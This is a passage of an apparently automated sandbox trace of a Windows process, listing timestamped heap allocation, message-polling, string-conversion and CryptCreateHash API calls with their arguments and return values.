[0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0087.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0087.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9c70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.447] GetProcAddress (hModule=0x76390000, lpProcName="CryptCreateHash") returned 0x763aeed0 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0087.447] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0087.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.450] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0087.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.450] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0087.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.451] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.451] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0087.451] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.451] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69760 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.452] RtlAllocateHeap 